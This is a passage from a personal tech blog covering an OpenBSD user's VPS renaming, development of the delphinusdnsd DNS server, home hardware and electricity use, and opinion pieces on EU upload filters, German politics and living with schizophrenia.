phi.virgostar.net -> red.centroid.eu
tau.virgostar.net -> blue.centroid.eu
The new VPS's I have already fixed at green.centroid.eu, vertex.centroid.eu,
and triangle.centroid.eu. This means I'm giving up my previous naming scheme
this is ok. I'm not going to have a scheme right now and just name stuff
whatever I feel like. Since everything is based off virgostar.net right now
I'm going to have to rename the nameservers. I hope to be finished by
november with all this work.
Electricity for 2018
January 21st, 2019
I got my electricity bill for 2018. Better for the environment, worse on
my wallet is the trend here.
Year
Night
Day
Total
2013
6941
1276
8217
2014
6906
1323
8229
2015
10151
1452
11603
2016
9643
1420
11063
2017
9788
1485
11273
2018
8546
1655
10201
Electricity is down by a whole 1000 KWh, this is what I wanted to
achieve, however it spiked in day use which is more expensive for
me. Sadly for me it cost 50 EUR more for the year which they'll
deduct from my bank account.
So what has changed in this household? Other than no freifunk (which really
didn't take up much electricity) I can't think of much. I possibly found
the trick to using the electric heating system better, which caused savings.
I dunno. 1000 KWh are a big difference...
The 480 byte message that caused 1.2MB+ to exit my network
January 21st, 2019
I wrote a small message to openbsd-misc (this one). In the process of doing so it cost
me 1.2 MB to exit my network in NXDOMAINS that get logged per query on my
nameserver.
It turns out whenever I mail to the list, my domain name
"centroid.eu", gets incepted at the remote nameservers when the remote mail
servers who receive my mail ask for a dmarc and DKIM signature. I have known
about this a long time now, but I decided to blog about it today.
I get about
3000+ queries per mail on omega, which is the only nameserver out of two that
logs queries for centroid.eu lookups. Since centroid.eu is DNSSEC protected the
NXDOMAINS do an NSEC3 proof of nonexistance which is up to 600 bytes per answer.
It doesn't anger me, but I'm wondering if there is a more silent way of posting
to OpenBSD-misc?
OpenBSD on Hyper-V on Windows 10 (pro)
January 22nd, 2019
I must..have..OpenBSD :-). So I have put it emulated in HyperV which comes
with Windows 10 Pro. Have a look!
And a dmesg from inside the OpenBSD guest:
OpenBSD 6.4-current (GENERIC) #532: Thu Jan 3 02:36:48 MST 2019
deraadt@amd64.openbsd.org:/usr/src/sys/arch/amd64/compile/GENERIC
real mem = 1056899072 (1007MB)
avail mem = 1015541760 (968MB)
mpath0 at root
scsibus0 at mpath0: 256 targets
mainbus0 at root
bios0 at mainbus0: SMBIOS rev. 2.3 @ 0xf93c0 (338 entries)
bios0: vendor American Megatrends Inc. version "090007" date 05/18/2018
bios0: Microsoft Corporation Virtual Machine
acpi0 at bios0: rev 0
acpi0: sleep states S0 S5
acpi0: tables DSDT FACP WAET SLIC OEM0 SRAT APIC OEMB
acpi0: wakeup devices
acpitimer0 at acpi0: 3579545 Hz, 32 bits
acpihve0 at acpi0
acpimadt0 at acpi0 addr 0xfee00000: PC-AT compat
cpu0 at mainbus0: apid 0 (boot processor)
cpu0: Intel(R) Core(TM) i3-2120 CPU @ 3.30GHz, 2575.80 MHz, 06-2a-07
cpu0: FPU,VME,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT, \
PSE36,CFLUSH,MMX,FXSR,SSE,SSE2,SS,SSE3,PCLMUL,SSSE3,CX16,PCID,SSE4.1,SSE4.2, \
POPCNT,XSAVE,AVX,HV,NXE,RDTSCP,LONG,LAHF,IBRS,IBPB,STIBP,XSAVEOPT,MELTDOWN
cpu0: 256KB 64b/line 8-way L2 cache
cpu0: smt 0, core 0, package 0
mtrr: Pentium Pro MTRR support, 8 var ranges, 88 fixed ranges
cpu0: apic clock running at 156MHz
ioapic0 at mainbus0: apid 0 pa 0xfec00000, version 11, 24 pins, remapped
acpiprt0 at acpi0: bus 0 (PCI0)
acpicpu0 at acpi0: C1(@1 halt!)
acpipci0 at acpi0 PCI0: _OSC failed
acpicmos0 at acpi0
"VMBus" at acpi0 not configured
"Hyper_V_Gen_Counter_V1" at acpi0 not configured
pvbus0 at mainbus0: Hyper-V 10.0
hyperv0 at pvbus0: protocol 3.0, features 0x2e7f
hyperv0: heartbeat, kvp, shutdown, timesync
hvs0 at hyperv0 channel 2: ide, protocol 6.2
scsibus1 at hvs0: 2 targets
sd0 at scsibus1 targ 0 lun 0: SCSI3 0/direct fixed \
naa.600224808d708f53af8eee3176445527
sd0: 16384MB, 512 bytes/sector, 33554432 sectors, thin
hvn0 at hyperv0 channel 14: NVS 5.0 NDIS 6.30, address 00:15:5d:02:0a:00
hvs1 at hyperv0 channel 15: scsi, protocol 6.2
scsibus2 at hvs1: 2 targets
pci0 at mainbus0 bus 0
pchb0 at pci0 dev 0 function 0 "Intel 82443BX" rev 0x03
pcib0 at pci0 dev 7 function 0 "Intel 82371AB PIIX4 ISA" rev 0x01
pciide0 at pci0 dev 7 function 1 "Intel 82371AB IDE" rev 0x01: DMA, channel \
0 wired to compatibility, channel 1 wired to compatibility
pciide0: channel 0 disabled (no drives)
atapiscsi0 at pciide0 channel 1 drive 0
scsibus3 at atapiscsi0: 2 targets
cd0 at scsibus3 targ 0 lun 0: ATAPI 5/cdrom \
removable
cd0(pciide0:1:0): using PIO mode 4, DMA mode 2
piixpm0 at pci0 dev 7 function 3 "Intel 82371AB Power" rev 0x02: SMBus disabled
vga1 at pci0 dev 8 function 0 "Microsoft VGA" rev 0x00
wsdisplay0 at vga1 mux 1: console (80x25, vt100 emulation)
wsdisplay0: screen 1-5 added (80x25, vt100 emulation)
isa0 at pcib0
isadma0 at isa0
fdc0 at isa0 port 0x3f0/6 irq 6 drq 2
com0 at isa0 port 0x3f8/8 irq 4: ns16550a, 16 byte fifo
com1 at isa0 port 0x2f8/8 irq 3: ns16550a, 16 byte fifo
pckbc0 at isa0 port 0x60/5 irq 1 irq 12
pckbd0 at pckbc0 (kbd slot)
wskbd0 at pckbd0: console keyboard, using wsdisplay0
pms0 at pckbc0 (aux slot)
wsmouse0 at pms0 mux 0
pcppi0 at isa0 port 0x61
spkr0 at pcppi0
vscsi0 at root
scsibus4 at vscsi0: 256 targets
softraid0 at root
scsibus5 at softraid0: 256 targets
root on sd0a (6782db52fad2d25a.a) swap on sd0b dump on sd0b
fd0 at fdc0 drive 0: 1.44MB 80 cyl, 2 head, 18 sec
fd1 at fdc0 drive 1: density unknown
This is awesome! I have recovered some respect for Windows. And hats off
for people like MikeB at OpenBSD who made this work!
Activated green.centroid.eu vps
January 23rd, 2019
It is located at hetzner in falkenstein, which is a location I haven't yet
used I don't think. I'm going to make green the new webserver instance, and
I'll use this and next week to copy everything over. The vps is the same
spec as red.centroid.eu: 2 GB RAM, 20 GB disk, 20 TB traffic, for 2.96 EUR/mo.
Deleted VPS upsilon.virgostar.net
January 24th, 2019
It never did much, and was last used as a testbed for testing opensmtpd
configs. But. It will be missed. Thank you upsilon. Now that I have
red, green and blue at hetzner online which are in nuremberg, falkenstein and
helsinki respectively I'm set for the future on these. I still have to
rename tau.virgostar.net to blue completely right now it only exists as DNS
forward entry. But that'll be done another time.
Cut 12% from delphinusdnsd.c of delphinusdnsd
January 26th, 2019
Yesterday I was in a coding mood. I didn't have much time, but this is the
diff I came up with.
I touched code that was close to 15 years old and removed it! I'm very proud
of this feat! It wasn't really bad, code but it could have been compacted
a lot more, that's what I did. The result may be a bit slower for answers in
delphinusdnsd, but the code is a lot more manageable/readable.
Delphinusdnsd now uses control sockets instead of pidfile
January 30th, 2019
Running delphinusdnsd twice or three times at a time on a single host (but
different ports) has always been pretty hard as there was some confusion
to the pidfiles. I tried to solve this with a control socket that is
controllable via dddctl. Stopping and restarting delphinusdnsd should now
work well, you can start it too but are only limited to 2 argument options
(-s and -f) to a start. -s is specifying the path to a socket and -f
specifies the config file to use. I know I'll enjoy this very much.
Purchased 3 books from Amazon
January 31st, 2019
Inside Windows Debugging: A Practical Guide to Debugging and Tracing Strategies in Windows - Tarik Soulami
Windows Internals, Part 1 - Pavel Yosifovich et al.
Troubleshooting with the Windows Sysinternals Tools - Mark Russinovich
I paid premium delivery because I didn't want to wait around on saturday for
the books to arrive, they'll be delivered friday. Next time I buy books it
should be earlier in the week.
News from Goldflipper
February 2nd, 2019
What is Goldflipper doing these days? Have a look.
Such a goldy!
Delphinusdns is one step closer to replicant mode
February 8th, 2019
This last week I've been working on AXFR routines for delphinusdnsd. In order
to test the functions I put them into dddctl query. Here a sample axfr output:
I put the \'s in there to show it better on my blog. Here is the help for
dddctl query:
beta$ dddctl help query
usage: dddctl query [-46BDITZ] [-@ server] [-P port] [-p file] name command
-@ server Use server ip.
-4 Use IPv4 only.
-6 Use IPv6 only.
-B Output as a BIND file.
-D Use DNSSEC (DO bit) lookup.
-I Indent output.
-T Use TCP.
-Z Output as a zonefile.
-P port Use specified port.
-p file Output to file.
Well I've been fiddling with the formatting of this all and I'm not fully
satisfied (it's gotta look like dig! :-). But I'll get there. Maybe next
week I'll be able to pull zones from a delphinusdnsd.
A new database for Delphinusdnsd
February 9th, 2019
Somehow it seems like I'm always replacing the database. It's true. I'm not
happy at the moment with the current database, see here. It takes up too much virtual
memory. So today I doodled a little with something that I think this should
be replaced with (it looks almost like a structure out of McKusicks book):
struct sdomain {
RB_ENTRY(rb_node); /* RB_ENTRY for domain name */
u_int16_t rrtype; /* rrtype for domain name */
TAILQ_ENTRY(domain); /* tailq of more sdomains's */
TAILQ_ENTRY(record); /* tailq of rrtype type entries */
};
struct domain_a {
TAILQ_ENTRY(record); /* tailq of rrtype type entries */
struct in_addr ia; /* holds the A RDATA */
u_int8_t region; /* possible region for split horizon */
};
+-------------+
| RB_TREE |
+-------------+
|
| centroid.eu
| +----------+ +-----------+ +----------+
+-------| sdomain |----| sdomain |---| sdomain |---> NULL
| +----------+ +-----------+ +----------+
| | | |
| | | |
| +----------+ +-----------+ +----------+
| | domain_a | | domain_soa| | domain_ns|
| +----------+ +-----------+ +----------+
| | | |
| v v |
| NULL NULL +----------+
| | domain_ns|
| +----------+
| |
| v
| NULL
| name.centroid.eu
| +----------+
+-------| sdomain |---> NULL
| +----------+
| |
| |
| +----------+
| | domain_a |
| +----------+
| |
| v
| NULL
|
v
So there it is, ASCII art. I'm gonna think about this for a few days before
getting started, because this is kinda urgent.
Actively working for 3G DB on Delphinusdnsd
February 13th, 2019
The last two days I've been working on new database on delphinusdnsd. The
code needs to be adjusted and every file possibly will get touched. I may
be able to commit it on friday or next week, depending how long it takes.
The new database is not much unlike what I have written in the previous
article (fixed up for technicalities such as the _ENTRY's and TAILQ_HEAD's).
What I wrote previous article was without guidance of manual pages.
Delphinusdnsd has a new database
February 16th, 2019
I spent monday to friday working on this, today I did a bit of regress work
to test records, I haven't found a bug since yesterday afternoon/evening.
The memory footprint of delphinusdnsd has been drastically reduced by order
of thousands. To give you some eye candy:
beta$ dddctl configtest -c
Records = 266094 , OK
beta$ ps auxwww|grep delphinusdnsd
_ddd 3694 0.0 0.0 1140 1164 ?? Ip 9:50PM 0:00.01 \
delphinusdnsd: unix controlling socket (delphinusdnsd)
root 88773 0.0 0.0 1108 1292 ?? Ssp 9:50PM 0:00.94 \
delphinusdnsd: master (delphinusdnsd)
_ddd 9236 0.0 1.4 467124 475856 ?? Sp 9:50PM 0:04.26 \
/usr/local/sbin/delphinusdnsd -l
beta$ time dddctl configtest -c
Records = 266094 , OK
0m02.83s real 0m01.84s user 0m00.48s system
To explain this I have created a zone of A records from /usr/share/dict/words
which are 250K or so, on top of the 30K words I had in a zone. Before the
30K words too 13GB virtual memory, now 266093 records take up 467124K or 456M
virtual memory. I think it's super personally. Thanks to Otto at OpenBSD who
made me realise I need to change my database as the OS won't give me any more.
This is better anyhow. I have been thinking on how to apply my dns server
with this new db and I'm thinking of creating an updateable DNS server that
stores PAGEs from RAM of a computer. Because it is so fast I think it would
make wonderful project. Here in regards to its speed:
Before you grab a snapshot for this new database daemon give it a week for
bugs to be found and ironed out. But I checked it against current centroid.eu
zone and it seems to be OK. Anyhow remember the license says "AS IS", so it's
your fault if you use it now. This database will be in the 1.4 release which
will likely be in december.
German Politics: What does the SPD want?
February 18th, 2019
It seems to me that the SPD is a puppet of a coalition partner. They keep
saying "may we?" and one really wonders what they are doing in government.
My statement to you: Make up your minds, because the outcome will determine
your votes next election. Meanwhile we have a real lack in fairness in this
social fabric in Germany. What are you gonna do, SPD?! And if it all fails
why are you still a coalition partner, in government?!
Gmail has started blocking me, after 5 years
February 20th, 2019
It's worked for five years. See here. I haven't changed much in the last little while to cause
any problems. So it's gmail who have updated some policy. I complained to
them, and hoping to get this straightened out.
New delphinusdnsd in production
February 22nd, 2019
I have put on a snapshot of last night on into production on
omega.virgostar.net. I'm hoping it's alright I tested it to
the best of my ability. Fixes are: an ENT reply with dnssec
option on (see. ent.dtschland.eu), and it has a new database
that I put together by February 16th. Since then I just fixed
a few bugs and hope it's bugfree by now.
That is a version reply of omega's delphinusdnsd indicating it is
from today. The query string was: @omega.virgostar.net version.bind ch txt
Delphinusdnsd does TSIG Notify+AXFR now
February 28th, 2019
I'm very happy of this. Here is the NSD log where the test zone was
pulled with the right key:
Feb 28 11:22:48 tau nsd[97745]: xfrd: zone dtschland.eu committed "received
update to serial 2019022801 at 2019-02-28T11:22:48 from 108.61.211.139@10053
TSIG verified with key *censored*"
Feb 28 11:22:48 tau nsd[91883]: zone dtschland.eu. received update to serial
2019022801 at 2019-02-28T11:22:48 from 108.61.211.139@10053 TSIG verified with
key *censored* of 6266 bytes in 0.000263 seconds
Feb 28 11:22:48 tau nsd[97745]: zone dtschland.eu serial 2019022201 is updated
to 2019022801.
I'm very happy of this. Now I'm gonna try to take it easy for the rest of the
week. Happy February + March!
I have a job interview tomorrow
March 6th, 2019
Finally an opportunity to make some money again. I have been lightly
searching since last summer. In the meanwhile I did several projects
the powerpc64 project, getting a closer look at windows server and some
time invested in delphinusdnsds (which seems to get better with time).
I didn't secure a grant this year and I'm not trying again (that was
prototype fund). Also the electric car didn't work out in 2018. Maybe
in 2019, if I get paying work, I'll get a colocation at an ISP, other
than that I'm considering rebuilding mail at vultr.com VPS's. That work
should be done by November. So that's where I am job and projects wise.
Crimped three patch cables
March 6th, 2019
A fourth patch cable I threw out for being bad. But I basically checked what
these patch cables go for (cat 5e, RJ45) and the are between 1 and 8 EUR. So
I've bought myself lunch with this.
There is order now in my cabinet. One thing I'd need is a labeller, but that
will be in due time. I can't justify it for 3 ports.
Ahead of Brexit, buying three OpenBSD posters
March 8th, 2019
The OpenBSDStore is in England. So ahead of Brexit I decided to buy three
posters from OpenBSD 5.8+ days. These will decorate my apartment soon.
I am against upload filters (article 13)
March 12th, 2019
There is a big stir in europe about article 13. While I don't understand the
specifics, it leads one to think that the EU wants us to be consumers and not
upload to platforms such as youtube at all. This can't be! What we need is
a search engine that is customizable so that everyone can find what they want
to see. Put restraints on just what a community wants is not really a good
idea, because people inside communities want different things. The german
wikipedia is protesting article 13 by shutting down on March 21st. I think
that's a drastic wrong. Don't fight a wrong with another wrong!
So what
I have done is I copied 416,000 articles from wikipedia and put them on a
private vps. With 50 GB SSD space that's all the compressed 5 GB dump plus
the import could handle. So roughly spoken the german wikipedia needs around
128-150 GB of space, that's a good to know. I'm also glad I know the process
of copying wikipedia now, and the ImportDump.php program in wikimedia has a
memory leak unfortunately I had to restart it with a new offset half way
through.
CryptoBook USB
March 12th, 2019
So, four years ago I made cryptobook, which is a USB stick based encryption and
decryption tool. It works on basis of one time pads, which when the algorithm
creating the random numbers is secure, are secure.
For the cryptobook you'll require a recent vmware fusion for it to work. The
OS on the cryptobook is OpenBSD 5.8 so it is 4 years old. Have a lot of fun!
Back four years ago I made a manual as well explaining how cryptobook is made.
But it's in german. Anyhow here it is in
pdf format. Please be aware that you can just encrypt little things with
cryptobook although it uses a 4GB pad max. The pad gets shared among your
family or co-workers and then you can encrype AES keys for example and
securely transfer those per USB stick. USB sticks cost 5 EUR in 2015 for a
8GB stick. Today you can get a 16-32 GB stick for that, but I'd stick with
8 GB.
The difference between wrong and accurate timing
March 12th, 2019
In Germany everyone is a taxpayer. We have a general sales tax, so even if
you buy a snickers bar you're a tax payer. Just it's hidden from you, but
it doesn't matter how they apply it, what my article is about is time.
DCF77 is a signal that is sent out by a public institution paid for by tax
payers. It is an important piece of infrastructure for Germany and I remember
clearly from grade five in 1986 when people had the first digital watches that
made use of this signal. In fact a lot of things in Germany depend on it.
When I cycled from Frankfurt to an undisclosed location 90 km up river along
the Main river I passed the transmitting towers of Mainflingen which is the
location where DCF77 is sent from, there is several atomic clocks that make
this signal accurate at the time of send. I approached a company making
radio clocks for computers that use the DCF77 signal, and low and behold they
don't sell to individuals, only corporate firms.
So to sum up. They, are a company that
leans on a signal, paid for by tax payers (ie. everyone) to make income yet
they don't sell back to the tax payer. Funny that. And all their contacts
of resellers sell only to corporate customers as well. They also lean on
Galileo signals paid for by europeans, and GPS paid for by americans for
other products, but I'm only concerned with the DCF77 products right now.
It's rather ridiculous that I have to jump through hoops to get accurate time,
ie. SDR or bettering NTP, when all it could have been is a simple order through
a friggen web interface.
Equinox in 4 days
March 16th, 2019
Equinox is upon us again
in four days. From then on the nights should be shorter than the days. It
also marks the official start of spring in the northern hemisphere and start
of autumn in the southern hemisphere.
Got a UPS for my birthday
March 19th, 2019
I got another APC-650 BackUPS. This is the second of this model, I'm quite
happy with it. This is connected to my monitor, workstation and voip phone.
According to the OpenBSD upd driver it gives me 22 minutes to shutdown the
system and do a phone call that I'M unavailable and do other emergency
procedures. The UPS in the hallway on the DSL modem has about the same
charge.
hw.sensors.upd0.percent0=100.00% (RemainingCapacity), OK
hw.sensors.upd0.percent1=100.00% (FullChargeCapacity), OK
hw.sensors.upd0.timedelta0=1357.000000 secs (RunTimeToEmpty), OK
That's the output from a sysctl hw. I still have to put on the AP which
switches the voip phone or it's all for naught so I'm hoping to be getting
about >20 minutes still.
German Wikipedia is down protesting article 13
March 21st, 2019
I think it's wrong for them to do this, hence I have put up a backup of
wikipedia online. It's only partial and limited in bandwidth so I'm not
going to make it available to all. In regards to fighting article 13, I
think it's wrong to fight this with another wrong. Contact me privately
if you must have a text-only version of de.wikipedia.org, please don't
share the address that I may give you.
How my SOHO office looks like now...
March 21st, 2019
Here is two photos I made:
The OpenBSD posters are new, I got them a few days ago.
Upload filters, discussion turned me somewhat
March 23th, 2019
When I was 18 I first used the Internet, and before that I used BBS's. I
was trolled to hell and back on either, but that's not the point I'm making.
Ever since those days I had this attitude that noone younger than I would be
on the Internet, in fact I almost believed it. Now then. I have come to
accept that young people use the Internet and are vulnerable in certain
situations. And I know in the current economic model most parents don't guard
their kids from the dangers that can be found on the Internet. Also Children
have a natural curiosity to find themselves in dangerous situations. It can
be a dangerous world.
The upload filters could be used for protecting children and young adults. But
there is a problem. Only the tech giants can afford to utilize the apparatus
needed to watch over the young. And that squeezes out the medium and small
sized companies and organizations who are already in a niche market. So then
what do you do, when you require Machine Learning and Artificial Intelligence
to somewhat "grep" through a video for adolescents for content that is not
suitable for their age? What do you do when you require a large server farm
to "machine learn" this apparatus? Another problem that exists for me is
that I do not have any experience with this technology. It became wildly
popular perhaps a decade ago and I have purchased maybe one book on the subject
(although a good book) but I have read only little of it.
I believe now we can have an upload filter if the technology allows and we can
have protection for the young people. We don't need to partition the Internet
into an adult Internet and a kiddie web, that's the worst of the two kinds.
However the technology for doing this should be available to all, and if we
are not technologically capable of doing it as a one person operation then
we may as well not do it, at that point we're not ripe for doing it. Noone
should be squeezed out, because they don't know something. Open Source has
not caught on to AI is my understanding, it still is done in the shadows of
tech corporations who cater to the tech giants is my idea on the topic.
Where does this leave the censorship debate where police, state,
and religious leaders can censor someone because the technology allows this?
We need to adjust our societies to the times I guess, and that must be done
first before we allow any censorship on the Internet. We need to fully
democratize, and uphold human rights and values. Noone should be censored
unless they do damage to another human being. So we should also strengthen
humans resistance factor. This means for example legalizing weed because it
builds up a resistance in the body when hit with potent weed. Much like weed
we need to build up resistance to all sorts of things, not just weed, but in
doing so we must legalize them and regulate the intake.
So while I'm for upload filters, I'm not for article 13 as proposed to the EU
because we're not ready yet. We haven't solved the outlying issues. The
Internet came so fast onto our society that the young are the ones testing the
limits of society, (yep they are the dumb ones, they haven't seen anything yet,
and need to be prepared, we all need to be prepared). Let's put all the issues
on the table and see what we can do to solve them all in one shot and I'm sorry
this does not allow it to be fixed in a term of a politian, it may take 30
years. Meanwhile there is a hole in our society that isn't plugged making us
vulnerable. Let's not rush things, but do them right.
More Discussion about Upload Filters, unexpected realizations
March 26th, 2019
I had more discussion about upload filters, and I'll try to map out the
arguments. There is two sides, those for and those against upload filters
and the two are are in a stale mate in my opinion, we need a third idea to
settle it.
Viewpoint one is:
Upload filters are wanted by Artists and all those who create intellectual
property. Their argument is that they rely on income of their arts and it
should not be "pirated" because someone likes it. If copying of arts is
left unchecked it squeezes out the artist from existance.
Viewpoint two is:
Upload filters are not wanted because Artists only refine what is found in
nature. They're creativity is found in the common good. The needs of the
few (the artists) does not justify restricting the needs of the many (internet
uploaders). It is the artists viewpoint that upload filter antagonists are
communists.
The third viewpoint I have thought out is the following:
In order not to have upload filters but facilitate an artists way of life we
need a common ground. A universal basic income is the answer. It allows
artists time to create their works, while getting paid, and it allows people
to take these works for the common good without being restricted.
While this isn't exactly capitalist, it's not communist, and it upholds the
democratic rights of the many who are threatened by a minority (the artists).
We need arts, they are expression to the highest level and give hints to our
way of life on improvement. Only the problem is with artists who sell their
works to the rich and those works never see the light of day, because they
can't be shared.
It does not benefit society in those cases but benefits
the few. Also do we want artists who create works of art that is so unique
that only a dozen eyes set on it at all. This isn't fair, because society
does shape the thinking of everything. Other works of art are inspiration to
build on to an idea, if there is no distribution there is no growth of an
idea.
Internet vs. EU (are we all prisoners of a regime?)
March 26th, 2019
The EU just dipped in popularity. If it comes to a showdown between the
Internet and EU I'll take my hat and join the Netizens. I've been a
netizen since 1994, how long have I been a EU citizen? Probably not that
long. If you haven't heard by now the EU has passed legislation that
upload filters (ie. article 13 and 11) are going to be required on platforms
such as google/youtube and facebook.
This puts a damper on freedom for a large chunk of the population. I was
considering voting for the SPD in some sort of europe election (if we actually
get to vote in this thing), now I'm not so sure. We'll have to review who
voted what in the EU parliament. I'm looking forward to the OneWeb and
Starlink satellites which I'm considering to get linked to. As we do not
need a partitioned Internet and this is the answer regarding this threat.
Thinking of switching language of this blog
March 27th, 2019
When Great Britain leaves the EU, there may not be a reason to speak english
anymore to reach EU citizens. What may happen (not sure yet), is that I'm
going to switch to german. Only if Ireland is still in the union and the
one official language is english will I think of keeping english. By now
a lot of translators exist to make comprehension of any language possible,
I think it's even built in to chrome. Just wanted to put the thought out
there, not to scare you, but to let you know I'm considering this. I have
mediocre french skills perhaps I should switch to french? :-)
Schizophrenic bashing
March 29th, 2019
Jan Fleischhauer starts the bashing none too soon, early enough for the schizo season. I'm disgusted at this.
He likens Holocaust denial with Schizophrenia, calls it digital schizophrenia.
Jan, you're messed up, retract your article.
Living with Schizophrenia: We are the 1%
March 29th, 2019
Genetically we differ from the rest of humanity, but we are part of the
human family. Behaviourly we differ as well, often we are loners, because
any form of making contact to the 99% is misunderstood and coupled with
embarrassment when signals are mistaken. Yes we are probably what the
Neanderthals were in the old days when they existed. We are ostracized
often by others. We are the people that are blamed when things go wrong.
And simply put we are often used just to find excuses when things don't
go right, say at work. Hitler did not have schizophrenia nor did the
Nazi's, in fact they euthanised people with mental illness and disorders
and did them like the jews. So I find it weird that particularily in
german society people still make a negative out of someone who is a born
outcast (see previous article). Yes it may be that we are hypocrite,
because society is holding out the guns, drugs, weapons, sins and what
have you. We are the ones that are tempted a lot quicker to misuse these
things, it's a failure of good judgement. When badmindedness is rewarded
with drug-use in this society who looks beyond it? It's us when we had
enough. What is a bad mind, what is evil? Who is to judge another human
before god for what they're thinking? Sure temptations can mislead us
and have in the past. To me it's only human, an attack on my kind is an
attack on me though, we are not the same and we differ even in our own
ranks. Go study an alien or something eh?
Going to rent three more vps's
March 30th, 2019
The month of march had its interruptions. I had a lead for a job but it turned
out to not be fruitful. So for April I'm prioritizing my dns server work
and work on my vps network. I'm going to get three vultr vps's to replace
omega.virgostar.net.
The three will do the exact same function but will cost 50 cent/mo less than
omega, so around 9.50 USD/mo. This brings my network temporarily up to 7 vps's
and I'm going to have to monitor them. I'm going to install nagios on red. I
have a new naming scheme. I call it the rainbow vps's. Red, green, blue,
orange, yellow and purple. A seventh named indigo will have to wait until
needed to make the 7 colours of the rainbow happen.
The nagios will likely only ping the remote hosts and report them as down or
not. Maybe it will monitor smtp ports as well. So that's what's happening in
april.
April 1st approaching
March 30th, 2019
While the western world makes jokes on april 1st. I believe this day is dead
serious. I was never one for making silly jokes on this day.
Donated 12 EUR to Aktion Deutschland Hilft
March 31st, 2019
The money is intended for Mozambique cyclone Idai victims.
Changed nameservers
April 2nd, 2019
I changed the nameservers of my domains, with the new VPS that I got.
This is related to the article 2 spots down "Going to rent three more vps's".
It turns out that it was only two more vps's because I couldn't find the plan
for $3.50 in vultr's Frankfurt servers. So I got two $5 servers instead. They
are called yellow and orange. Orange I'll make the new mail server, and yellow
is dedicated for DNS. Blue is the renamed tau.virgostar.net (which I still have
to rename in the reverse dns). All the colours of a rainbow nameing scheme. :-)
The TCP three way handshake
April 5th, 2019
One of the most basic things to learn is about the three way handshake of
TCP. I learned this a good 23 years ago, and it got reiterated over time
as I took courses *yawn*. Anyhow 18 years ago I did codeblue (cb) which
is a forger but it doesn't receive traffic. So while playing around I
modified a sniffer that I made 22 years ago with codeblue to establish a
classic
three way handshake. This is for educational use only. While I was
there i modified this a little bit to answer ARP as well, and then explored
windows port 135 a little. Unfortunately other than that windows doesn't
ever close this port I found nothing wrong.
Next month is the blogs 10th Anniversary
April 5th, 2019
I'd like to celebrate but other than drawing something I don't know what
else to do. I like the graphics on the blog right now though.
Fixed a bug in Delphinusdnsd
April 8th, 2019
The delphinusdnsd, when run with signed and non-signed zones had a bug with
non-signed zones when the query had the DO bit set. The answer would always
reply with TC bit set at that point. I fixed this yesterday afaik. A
snapshot would fix this issue if you're running this daemon.
Julian Assange Arrested in London
April 11th, 2019
Julian Assange has been arrested. He faces minor charges in London. However
it is my opinion that it's imperative that he gets safe passage home to
Australia on a non-stop flight that doesn't pass US territory. His self exile
is a shameful waste, making me believe he was in a desperate situation.
BBC story.
Firewalled sshd port
April 12th, 2019
I have whitelisted my sshd port. The time is right I think. Quantum computers
exist. And RSA's days are numbered before it's broken. On top of that there
has been a report on OpenBSD's misc mailing list of someone claiming they were
hacked through sshd, I'm guessing only more of these reports will come in the
future. This is just a precaution because I'll never log in from China.
In my mind the CDROM, DVD, Bluray has died
April 13th, 2019
I still have 3 CDROM drives on 2 computers. Next year it'll be just 1 computer
after I retire a workstation (see my computers).
In 2023 the blueray drive will die with the workstation it's in and only an
external CDROM drive will remain. I may as well start moving some CD's to
ISO's and put them in a safe place.
I remember a time when I was very excited to get CD's from OpenBSD which were
a product. I bought this product and felt good about it. I know OpenBSD
disagrees with me with the technicalities of what a product is. I wish OpenBSD
would in the future make products again and sell the product on memsticks.
There is some really beautiful memstick designs out there with different
colours and the chance to put logos on these. Ultimately the best USB stick
that could be sold by OpenBSD would be an RTC clock coupled with a memstick
which is read-only until a sunset date, then it switches read-write and you
can write over the data on it. I'll keep dreaming.
Do you still have CD's? Have you thought about converting it to another format?
I have ripped my parents CD collection to mp3's once (so they can listen in
car), I think I'll need to do it again some day to make them flac format
files which are lossless and currently my favourite audio format.
Delphinusdnsd, a 30 year project?
April 13th, 2019
I'm doing the counting up of years and how much longer I want to be involved
with delphinusdnsd. Right now I have 15 years under my belt for it, and I'M
hoping to go another 15 years until 2034. At that point I will be 58 and will
likely want to finish up other projects before retirement.
Parallel to this I want to take delphinusdnsd to another level. A page server.
The concept is the following. Pages of RAM are updated and read from a
bunch of delphinusdnsd's on a 10 GbE network (possibly with bonding, so a
20 GbE network). The delphinusdnsd protocol is modified to allow 4096 byte
pages in its format. The kernel on a computer is modified to talk DNS to this
delphinus cluster and do the necessary operations. I want to scale lots of
RAM on hardware that has little native RAM. And I want to see how good it'll
scale.
With the latter project I want to start within the next 2 years and be finished
by 4 years from now. I'll be 47 then. If it works well I may spin it off
into an enterprise and try to make money off it. So to prototype this I want
to buy a cluster of SoC's (like raspberry pis) and try with them until going
further and buying a bunch of servers with lots of RAM that a delphinusdnsd
will run on. Staying with 4 servers for prototype and final model is my plan.
This is my dreams and I hope I can achieve them before getting too old to do
this stuff.
Goodbye Julia, I voted for you
April 15th, 2019
Julia Reda was MEP in
EU parliament for 10 years. I don't know what sort of legacy she leaves
behind but I remember voting for the Pirate Party last election and allowing
her to take her seat in parliament. Now with the new EU elections coming up
she will not be running this term. Goodbye Julia, you kept popping up in IT
News sites I read and I think you did a good job, though it probably wasn't
easy as the only Pirate in EU. In the new election I'm hoping to see the
SPD get as many votes as possible. We will be going to the polls in May 2019.
I'm voting for my local representative
Kerstin Westphal.
Good luck to all!
Talking a little.
Tags: OpenBSD, 6.5, release, Easter, PowerPC, 64-bit, PowerMAC, SSD, Intel, Linux Primer
My Macppc computer sucks 140W in idle
April 18th, 2019
This is too much for me. I can only run this computer at special occasions.
It would cost me 300-380 EUR a year (guestimate) on electricity alone. Also
something to know is that it sucks 1-2W in power-off mode (zombie-power).
Kinda sucky. I'm gonna perhaps save 10W when I take out the SAMSUNG HD drive.
But still!
Hopefully fixed my SIP connection to telekom.de
April 18th, 2019
I had a problem with disassociations with telekom.de on my sip phone. After
I heard a friend used TCP on another network, I decided to try it. I got
399 Symmetric NAT detected or something error codes. After googling a bit
I determined it was use of a STUN server I had configured. So I turned it
off and finally was able to do a test call, and it worked. So here is hoping
it will stay up on my phone display and works. I'm a little red-faced I
didn't really fix this myself, after having worked 8 years as a sysadmin at
a voip shop.
Happy Easter
April 21st, 2019
I am spending a 4 day Easter at my parents house, I'll be back tomorrow though.
Reading a little.
Tags: Linux Primer, preface reading
OpenBSD 6.5 Released, some downtime after upgrade, and donation
April 24th, 2019
